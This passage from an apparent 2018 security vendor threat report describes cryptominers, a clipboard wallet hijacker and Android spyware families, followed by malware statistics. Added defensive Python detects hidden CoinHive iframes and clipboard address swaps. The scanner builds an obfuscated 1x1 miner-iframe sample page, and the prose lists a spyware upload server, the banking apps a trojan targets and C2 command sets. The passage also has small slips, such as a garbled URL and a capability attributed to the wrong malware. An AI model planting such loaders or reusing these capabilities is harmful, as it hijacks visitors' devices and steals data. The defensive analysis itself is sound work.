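    for pid, ind in hunt(SAMPLE_EVENTS):
        print(pid, ind)
```

A single encoded command is common in legitimate administration, which is why the hunt only raises an event when the decoded script reaches into the registry for a base64 blob, when a scheduled task is created to relaunch PowerShell, or when two weaker indicators coincide. The decoded script text is also what an analyst needs in order to find the registry value holding the payload.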
This emergency clearly demonstrates how dangerous cryptominer activity can be. Just imagine it: the entire compute capacity of the enterprise's computers was engaged in mining cryptocurrency, depriving employees of the ability to perform their jobs. Comodo analysts took over the situation and cleaned the infection from all involved computers, but of course the company's financial losses were irreversible.
Invulnerability to antivirus and persistence in the system are the most important attributes for a cryptominer, because the longer it runs within the infected system, the more it profits the attackers. That is why cybercriminals give special attention to a cryptominer's ability to elude antivirus software.
Below is another cunning technique that turns an infected machine into a slave of the attacker.
3.2 WinstarNssmMiner: a system killer
Like other cryptominers, WinstarNssmMiner is purposed to steal computer resources to mine cryptocurrency coins for cybercriminals. But it has a special feature: it can root into a system so deeply that it becomes unremovable. Attempting to kill it will kill the target system entirely.
The secret of WinstarNssmMiner's persistence lies in its method of infecting a victim's computer. It consists of two processes injected into two system svchost.exe processes. The first performs the main task, mining cryptocurrency. The other runs in the background looking for antivirus products and disables them.
The malicious code disguised as svchost.exe
Especially impressive is that both infected svchost.exe processes possess the system attribute "CriticalProcess", meaning that terminating either of them will crash the system, leaving the user with a blue screen.
WinstarNssmMiner spreading around the world
Cryptominers can kill not only victims' systems but also their cryptomining competitors.
3.3 CoinMiner kills rivals
CoinMiner stands out from other cryptominers with a kill-list feature that checks the infected machine for the presence of other cryptomalware. If an "alien" cryptominer is detected, the feature terminates its processes.
CoinMiner kills its rivals as follows.
The code below downloads CoinMiner for the Windows architecture (x86 or x64) and then checks whether a miner is already running by testing for the presence of an "AMDDriver64" process.
The code downloads CoinMiner and checks if a miner is already running
The malware maintains two lists, named $malwares and $malwares2, with the names of the processes it is instructed to kill. The lists include other types of cryptominers.
In this way CoinMiner takes undivided possession of the victim's computer and uses its resources for mining cryptocurrency.
Some cryptominers earned the spotlight of the mass media and cybersecurity researchers, which made it easier for users to detect them. In Q2 these cryptominers learned to hide; CoinHive is the brightest example.
3.4 CoinHive changes its skin
CoinHive is a popular JavaScript cryptominer. If you put its string of code into your website page, every visitor to the site will mine coins for you.
As you can see, the CoinHive script is easily detected.
The CoinHive script
After many publications on this subject in the mass media and cybersecurity reports, users have started checking website code for cryptominers. But in the second quarter perpetrators found a way to overcome this obstacle. Now they use a sneaky trick to camouflage the CoinHive presence with URL shorteners.
As a result, the malicious code on a webpage looks like this:
The obfuscated malicious code on a webpage
If we decode the string, we encounter an iframe.
The iframe loads the URL shortener. Notice that the width and height of the iframe are set to 1 to make the iframe as invisible as possible.
Now let's look at the URL https://cnhv.co.
And there we find the familiar link to CoinHive.
The link to CoinHive
What is the impact of this trick? In a simple scenario a user visits a CoinHive-infected website. Noticing that her computer's CPU is overloaded, she decides to check the webpage code but doesn't find any signs of a cryptominer. So she concludes that something went wrong with her PC, while CoinHive co-opts her computer to mine cryptocoins.
The next malware in the row prefers not to mine cryptocurrency but to steal it on the fly.
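The scanner below is an added example, not code from the report, that automates the check described in this section: it decodes encoded strings written into a page and reports any iframe whose width and height are 1 or whose target is the cnhv.co shortener. The report does not say which encoding the loader used, so the example assumes base64 (atob) or percent-encoding (unescape); the sample pages and the short-link path are constructed.

```python
"""Added example (editor's code, not from the Comodo report): finding a
CoinHive loader that a page hides behind an encoded 1x1 iframe.

The report shows the chain: an encoded string written into the page, which
decodes to an iframe of width and height 1 whose src is the cnhv.co URL
shortener, which in turn serves the CoinHive script. The report does not
name the encoding, so this scanner assumes base64 (atob) or percent-encoding
(unescape), the two most common choices in such loaders. Sample pages are
constructed; the short-link path is a placeholder.
"""
import base64
import re
from urllib.parse import unquote, urlsplit

MINER_MARKERS = ("coinhive.min.js", "coinhive.anonymous", "cnhv.co")
SHORTENER_HOSTS = {"cnhv.co"}  # the shortener named in the report; extend as needed

SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)
ATOB_RE = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
UNESCAPE_RE = re.compile(r"unescape\(\s*['\"]([^'\"]+)['\"]\s*\)")
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
ATTR_RE = re.compile(r"(\w+)\s*=\s*['\"]?([^'\"\s>]+)")


def decode_payloads(script_body):
    """Decode every atob(...) / unescape(...) literal inside a script block."""
    out = []
    for b64 in ATOB_RE.findall(script_body):
        try:
            out.append(base64.b64decode(b64).decode("utf-8", "replace"))
        except ValueError:
            continue
    for pct in UNESCAPE_RE.findall(script_body):
        out.append(unquote(pct))
    return out


def hidden_iframes(markup):
    """Return iframes that are 1x1/0x0 or that point at a known shortener."""
    found = []
    for tag in IFRAME_RE.findall(markup):
        attrs = {k.lower(): v for k, v in ATTR_RE.findall(tag)}
        src = attrs.get("src", "")
        host = (urlsplit(src).hostname or "").lower()
        tiny = attrs.get("width") in ("0", "1") and attrs.get("height") in ("0", "1")
        if tiny or host in SHORTENER_HOSTS:
            found.append({"src": src, "tiny": tiny, "shortener": host in SHORTENER_HOSTS})
    return found


def scan_page(html_text):
    """Return (kind, detail) findings for plain and encoded miner loaders."""
    findings = []
    lowered = html_text.lower()
    for marker in MINER_MARKERS:
        if marker in lowered:
            findings.append(("direct_marker", marker))
    for fr in hidden_iframes(html_text):
        findings.append(("hidden_iframe", fr["src"]))
    for body in SCRIPT_RE.findall(html_text):
        for decoded in decode_payloads(body):
            for fr in hidden_iframes(decoded):
                findings.append(("hidden_iframe_in_encoded_script", fr["src"]))
    return findings


# Constructed pages for the example.
_IFRAME = '<iframe src="https://cnhv.co/short-link-placeholder" width="1" height="1"></iframe>'
OBFUSCATED_PAGE = (
    '<html><body><h1>Weather</h1><script>document.write(atob("'
    + base64.b64encode(_IFRAME.encode()).decode() + '"));</script></body></html>'
)
PLAIN_PAGE = '<html><head><script src="https://coinhive.com/lib/coinhive.min.js"></script></head></html>'
CLEAN_PAGE = '<html><body><iframe src="https://maps.example/embed" width="600" height="400"></iframe></body></html>'

if __name__ == "__main__":
    for name, page in [("obfuscated", OBFUSCATED_PAGE), ("plain", PLAIN_PAGE), ("clean", CLEAN_PAGE)]:
        print(name, scan_page(page))
```

The plain-text marker check is what the user in the scenario below performs by hand; the second pass over decoded script literals is what she is missing. A site owner or crawler can run scan_page over fetched markup and treat any hidden_iframe_in_encoded_script finding as a pointer to inspect the shortener target.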
3.5 Cryptocurrency clipboard hijacker intercepts transfers
It would be more accurate to call this program a cryptothief rather than a cryptominer, because it does not devour an infected machine's resources but actually steals cryptocurrency, redirecting it to the perpetrator.
Cryptocurrency transfers require a wallet address. The address is a long string of mixed characters and numbers, so it is almost impossible to remember or type in manually. That is why users usually copy and paste a wallet address to make a transaction. Cybercriminals regard this copy-paste step as a breach they can use to their advantage.
The cryptocurrency clipboard hijacker checks the clipboard for a copied wallet address. Upon finding one, it swaps it for the address of a wallet under the attacker's control. So the unaware owner of the infected machine delivers cryptocoins straight into cybercriminals' hands.
New Cryptocurrency Clipboard Hijacker sample can monitor 2,343,286 addresses
This malware is distributed in a bundle with the All-Radio 4.27 Portable software. All-Radio 4.27 is a legitimate video and audio player created by Russian developers, but cybercriminals copied the program and added malicious code. The malicious version of All-Radio 4.27 was used for spreading different types of malware, clipboard cryptocurrency hijackers among them.
Here is an example of a clipboard hijacker attack.
A user copied the wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs, but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm.
An example of a clipboard hijacker attack
Spreading of Clipboard Hijacker malware around the world
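Below is an added example (editor's code, not from the report) of how an endpoint agent could catch the swap described above. Because the substitute address is itself well-formed, validating the address does not help; the detector instead remembers what the user copied and alerts when a later clipboard read holds a different address of the same coin family. The event stream is constructed; the two addresses are the ones quoted in this section.

```python
"""Added example (editor's code, not from the Comodo report): spotting a
clipboard hijacker by comparing what the user copied with what is pasted.

The hijacker described in the report watches the clipboard and swaps a
wallet address for its own. The addresses it inserts are themselves valid,
so checksum validation does not help; what does is remembering the value
the user placed on the clipboard and flagging any later address-shaped
value that differs from it. The event stream below is constructed; the two
addresses are the ones shown in the report.
"""
import re

# Format checks only (the swap detection does not depend on checksum validity).
ADDRESS_PATTERNS = {
    "btc_legacy": re.compile(r"^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$"),
    "btc_bech32": re.compile(r"^bc1[a-z0-9]{25,62}$"),
    "eth": re.compile(r"^0x[0-9a-fA-F]{40}$"),
}


def classify_address(text):
    """Return the coin family the string looks like, or None."""
    text = text.strip()
    for name, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(text):
            return name
    return None


def detect_swaps(events):
    """Replay (source, clipboard_text) events and report silent substitutions.

    source is 'user_copy' for text the user put on the clipboard (a clipboard
    listener can tell because the owning window is the user's application)
    and 'poll' for a later read of the clipboard by the monitor.
    """
    alerts = []
    last_user = None
    for source, text in events:
        if source == "user_copy":
            last_user = text.strip()
            continue
        if last_user is None:
            continue
        current = text.strip()
        if current == last_user:
            continue
        kind_before = classify_address(last_user)
        kind_after = classify_address(current)
        if kind_before and kind_after and kind_before == kind_after:
            alerts.append({"copied": last_user, "replaced_with": current, "coin": kind_after})
    return alerts


# Constructed event stream; the addresses are the ones shown in the report.
SAMPLE_EVENTS = [
    ("user_copy", "3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs"),
    ("poll", "3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs"),   # unchanged so far
    ("poll", "1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm"),   # swapped without a user copy
    ("user_copy", "meeting notes"),
    ("poll", "MEETING NOTES"),                        # a case-changing clipboard tool, not an address
]

if __name__ == "__main__":
    for alert in detect_swaps(SAMPLE_EVENTS):
        print(alert)
```

Restricting alerts to swaps within the same coin family keeps legitimate clipboard utilities (formatters, password managers) from triggering it, while still catching the case in the report where one Bitcoin address silently becomes another. The same comparison, shown to the user at paste time, is also a cheap way for wallet software to confirm the recipient before a transfer is signed.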
Although cryptominers have decreased in quantity, they seem to be coming back in an updated disguise and promise to become a new serious challenge for cybersecurity departments and vendors.
4 Android Devices Under Siege
4.1 Spying, Stealing, Mining
Android devices are rapidly becoming high-value targets for cybercriminals and malware authors. This is not surprising, because today almost any smartphone is a treasure trove of information for perpetrators. People increasingly use smartphones for financial operations, but those are not the only jackpot for attackers. Today every smartphone contains a plethora of confidential information about its owner.
If the victim is a CEO, politician or other VIP, the content of the mobile device can be sold at the highest prices. Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims. Of course, not only cybercriminals hunt for smartphone content. Intelligence agencies and business competitors want to know everything about their targets. Add jealous spouses tracking every move of their partners and parents wanting to control their children, and you will easily understand why Android-oriented malware is a growing business.
Today spying is the number one purpose of Android malware. In Q2 Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them. You can see the whole family of these digital spooks on the graph.
The digital spooks
Like real-world spies, digital agents impersonate legitimate entities, pretending to be innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible, constantly change disguises to avoid detection and hone their tradecraft from version to version.
4.1.1 KevDroid
The first is named KevDroid. It's distributed in three versions:
Version-1: Naver Defender
Version-2: Netease Defender
Version-3: PU
Disguises of KevDroid
The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multifunctional spying abilities. It steals account details: contact id, name, phone numbers and email address of the owner. It grabs SMS messages and associated info. It attempts to read call logs (number, name, type, duration), emails (email, type) and photos of the contacts. After extracting all the data, the malware encrypts it with the "AES" algorithm and sends it to the attackers' server httphttpcgalimcomadminhrpupuphpdo=upload
KevDroid records the victim's every phone call, then encrypts and uploads it to the cybercriminals' server. In addition, it collects information about currently running services, installed apps and the launcher name.
The second version, Netease Defender, has additional spying abilities. It takes control of the device camera and covertly records the victim's activity. Then it sends the video to the attackers' server.
Version-3 of KevDroid takes photos, records calls and creates a list of files on the device. It also extracts the web history, account and contact details and the device information.
People assume they are safe if they download apps exclusively from the official Google Play store. This wrong assumption can be costly: the first version of the Desert Scorpion spyware was spread via official Google Play Services. The spyware was camouflaged as a chat app called Dardesh Instant App. But when a user downloaded and ran it, the app covertly connected to the cybercriminals' Command and Control server and downloaded the spyware onto the device. From that moment the spyware constantly kept track of all events on the infected device. Another means of the malware's dissemination was social networks.
Version-1: Dardesh, Google Play Services, Instant Apps
Version-2: Settings
Disguises of Desert Scorpion
The second version of Desert Scorpion records calls, audio and video, uninstalls other apps, sends and receives messages and tracks the location of the smartphone. It is included in some spyware tools like FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts the metadata and makes changes on the victim device.
4.1.2 Zoo Park
The next member of the spy family, Zoo Park, has 4 different versions:
Version-1: Telegram Groups, انتخاب دھم
Version-2: Postrall, Yes For Referendum, انتخاب دھم
Version-3: Celebs Gone Wild, جریدة النھار الكویتیة, 剑侠挂机
Version-4: VPN Easy, DroFirewall, m_android
Disguises of Zoo Park
The first version tries to impersonate the Telegram app. It extracts Accounts and Contacts details, encodes them with Base64 and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, Network Operator Name, SDK version, OS version, etc.), Call Log details and External Storage content.
The third version is included in spyware named "Spymaster Pro" and can:
Enable and disable the GPS services
Record audio and send it to the Command & Control server
Upload image files
Collect information about the applications installed
Collect browser data
Send SMS and read outgoing SMS
The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy, DroFirewall, etc.
In addition to the abilities of previous versions, it includes some additional tricks:
Extracts photos, audio and video
Records screen
Executes shell commands
Records calls
4.1.3 MikeSpy
Some spyware examples specifically hunt for messenger data, like the next digital spook, MikeSpy.
Virtual Girlfriend
Disguises of MikeSpy
MikeSpy camouflaged itself as a Virtual Girlfriend application. But instead of a girlfriend it has a bundle of malicious abilities:
Takes control over the Bluetooth adapter
Extracts data about accounts, contact details and installed apps
Extracts data from the WhatsApp message DB and related keys
Uploads collected data to the cybercriminals' server via FTP
4.1.4 Xloader
The next spyware, Xloader, combines spying with purposeful hunting for banking applications on the device. It has trust-inspiring cover icons imitating Facebook and Google Chrome.
Version-1 to Version-3: Facebook, Chrome
Disguises of Xloader
After infection, Xloader connects to its C&C server and executes the following commands:
Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
Check for the presence of the following banking applications: com.wooribank.pib.smart, com.kbstar.kbbank, com.ibk.neobanking, com.sc.danb.scbankapp, com.shinhan.sbanking, com.hanabank.ebk.channel.android.hananbank, nh.smart, com.epost.psf.sdsi, com.kftc.kjbsmb, com.smg.spbs
Extract contact details
Set Wi-Fi to always on
Version 2 can execute additional commands:
Send SMS and read outgoing SMS
Enable and disable a Wi-Fi connection
Access a location specified by the attackers
Make recordings
Make calls
4.1.5 Stalker Spy
The next malware in the row is Stalker Spy. As you can see, it's a champion in the number of masks it puts on to deceive users.
App Distribution
FlexiSpy MBackup
HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service
Mobile Spy
随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z
CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻
Disguises of Stalker Spy
In addition to the usual must-have spyware set, Xloader can turn on the microphone of the infected device remotely to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy, MobiSpy.
4.1.6 Mystery Bot
The next malware is much more than a spy. The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to the C&C server of the Locky bot. The second version of Mystery Bot is ransomware that encrypts files on external storage. After encryption the malware deletes the original files. So we can call it a spy with a "007 licence".
Version 1: Adobe Flash Player
Version 2: Flash Player
Disguises of Mystery Bot
Mystery Bot comes under cover of Adobe Flash Player. Below is a list of some commands that the malware can execute on your device:
Send_SMS - extract SMS content and send it to the C&C server
Send_USSD - send the USSD to the C&C server
Gethistory - monitor browser history
Start_AllApp - gather info about installed applications
Send_call - set the Intent action to call
Forward_call - forward incoming calls
ResForward_call - reset the forwarded calls
Go_Smsmnd - delete SMS content
Go_GetAlls - get SMS history
Dell_sms - delete SMS content in a conversation
Send_spam - send spam SMS
Start_Inject - call the injectors class
4.1.7 FakeSpy
FakeSpy also has many masks, which you can see in the screenshot:
佐川急便 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends it to C&C servers. It also checks for the following banking applications: aucomapp, softbankcomapp, docomocomapp.
Here are some commands from its Command and Control server:
contacts - Get contact details and email id
Mute - Set action to mute
Mms - Get MMS content
info - Get device information
4.1.8 RedAlert
RedAlert changes multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.
Version 1: EbookReader, Update Flash Player, Android Update, WhatsApp, Viber
Version 2: Update Google Market, Flash Player, Tactic, FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:
de.postbank.finanzassistent
pl.mbank
aib.ibank.android
The second version can block access to some websites, including Google Chrome, Google Play store, Gmail and YouTube.
4.1.9 Hero Rat
The next digital spook, Hero Rat, mostly operates on Iranian territory. It uses third-party app stores, social networks and messengers for spreading.
Version 1
CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره
Proxy دوست یاب Telegram Ton
شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان
Disguises of Hero Rat
Its code is available on a Telegram hacking channel. Notably, it's sold in three options: bronze, silver and gold.
After infiltrating a victim's device, Hero Rat shows a warning like "app can't be run". But it runs in the background and starts its spying activity. It steals text messages and audio records, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.
Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get free Followers and Telegram versions for the Iranian market.
4.1.10 Sonvpay
The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.
Version 1
Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot
Reccoder-Call QRCodeBar Scanner APK
Let me love you ringtone Iphone Ringtone Night light
Beauty camera-Photo editor Shape of you ringtone
Disguises of Sonvpay
Sonvpay covertly subscribes infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, this malware displays a fake notification with a "skip option". If you click this button, the malware begins to work in the background, subscribing the user to services she did not order.
It comes to victims in the variety of disguises shown above.
4.1.11 CoinHive
And the last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report, and here is the version for Android devices. CoinHive for Android comes in three versions, each of them updating its mining potential. It is disseminated via the counterfeit apps you see below. But one of the vectors is especially interesting.
Version-1: Netflix Hack, Instagram Hack
Version-2: TSF Launcher
Version-3: Android Service, PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via ... another cryptominer, named CoinMiner.
How is it possible? Let's imagine a cybercriminal who wants to infect victims with a cryptominer to utilize their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it into the victims' machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is a victim too. Thief robbing thief.
This story clearly illustrates the situation in cybersecurity in Q2: no one can feel totally secure. Even a predator can turn prey in seconds.
4.2 Android Malware Catalogued by Month
Below you will find detailed statistics on Android-targeted malware by month.
4.2.1 April 2018
Android-targeted malware in April
4.2.2 May 2018
Android-targeted malware in May
4.2.3 June 2018
Android-targeted malware in June
5 Malware in Q2 2018: The Big Picture
Above is a visualization of the malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections across 237 countries' top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.
5.1 Strategic Threat: Computer Worms
A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources and possibly cause a denial of service. For this Q2 2018 Report we place Worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.
5.1.1 Generic Worms
This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.
Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda and over 300 more.
The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of Worm infections.
And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.
5.1.2 Net Worms
A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses them from a local area network (LAN) or company intranet.
In Q2 2018 Allaple was the most common Net Worm detected, which Microsoft describes as a "multi-threaded polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.
The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.
5.1.3 Email Worms
Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.
This quarter the most common Email Worm by far was Runonce.
The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).
This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2.
5.1.4 p2p Worms
A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.
Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects ".exe" and ".scr" files and may leverage the Gnutella p2p network protocol to distribute copies of itself.
The bubble chart above clearly shows Russia as the primary home of p2p Worms in Q2 2018.
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many.
5.1.5 IM Worms
Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.
During Q2 2018 most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.
This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people by the FBI in 2012 for spreading banking malware via social networks with the Yahos IM Worm.
This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.
5.2 High Threat Malware
In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.
5.2.1 Backdoors
A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.
The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.
The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.
5.2.2 Viruses
A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.
Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files and spreads through infected removable drives such as USB flash drives.
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.
This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.
5.2.3 Trojans
Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.
In Q2 2018 Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".
The bubble chart shows that Germany (de) was the number one country for Trojans according to Comodo detections.
And this timeline shows when this huge Trojan infestation took place: at the beginning of June 2018.
5.2.4 Exploits
Computer exploits are pieces of software, chunks of data, or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage the target’s software or hardware. Exploits can enable unauthorized access, privilege escalation, or denial of service (DoS).
The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.
In Q2 2018, the majority of exploits detected by Comodo took advantage of a favorite hacker target: Adobe Portable Document Format (PDF) files, which were created in the 1990s to present documents in a common format independent of application software, hardware, and operating systems.
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.
5.3 Medium Threat Malware
In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools, and Malware Packers.
5.3.1 Constructor
Constructors are applications that can be used to automatically create malware files.
For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a “Severe” malware threat to PC users.
In Q2, Germany (de) was the top country of detection for Constructors.
And this timeline shows not only that Germany had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.
5.3.2 Packers
“Packed” malware refers to any means used to hide or obfuscate malicious executable code by compressing or “packing” it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means of obfuscating the attack.
MUPX, or the Modified “Ultimate Packer for Executables”, dominated this part of the malware landscape. MUPX is free, open-source software that is compatible with numerous file formats and operating systems and leverages the open-source UCL data compression algorithm, whose decompression code is just a few hundred bytes in length.
In Q2 2018, Russia was the #1 home to malware Packers.
This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
5.3.3 Email Flooder
Email Flooders are malware used to overwhelm an email server with messages in order to “kill” it or shut it down, in a form of denial-of-service (DoS) attack.
The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.
The primary country where Comodo detected this malicious behavior was Germany.
And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.
5.3.4 Virtual Tools
Virtual Tools are programs that can modify or alter malicious files to avoid detection.
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV, and RunFile.
The top two countries for Virtual Tools detections were Germany and the US.
This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.
5.3.5 Jokes
“Joke” malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.
Such malware is typically only labeled a “Medium” threat because the hacker’s intention is not to damage or destroy information but merely to have fun at the victim’s expense.
Germany (de) and the US were the top two countries of detection for Joke malware.
In this timeline you can see that this malware type is not numerous, but it is still something to be aware of.
5.4 Low Threat Malware Applications
In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications, and Unsafe Applications.
5.4.1 Applications
Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.
In Q2 2018, the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a “Potentially Unwanted Application”, or PUA, this software is nasty: it attempts to install files that run at startup, add drivers, inject processes, alter browser behavior, and modify DNS settings.
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.
And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.
5.4.2 Unwanted Applications
The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip, and more.
The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as “poor reputation” software that tries to install additional bundled software, modify the user homepage, modify the search provider, and/or perform other actions users might not have intended. Such programs include free toolbars, adware, and “system optimizers”.
As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.
And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.
5.4.3 Unsafe Applications
Unsafe applications are seemingly legitimate programs that are in fact frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.
The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to “crack” or patch unregistered copies of Microsoft software. Such programs are referred to as “hacktools” and may be distributed with additional malware that users can install inadvertently.
This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.
This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.
6 Vertical Analysis
In this section let’s examine unique malware profiles that Comodo identified within specific “verticals”, or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses, and Worms. Further, the diagram lists the #1 malware family for each vertical’s top malware type.
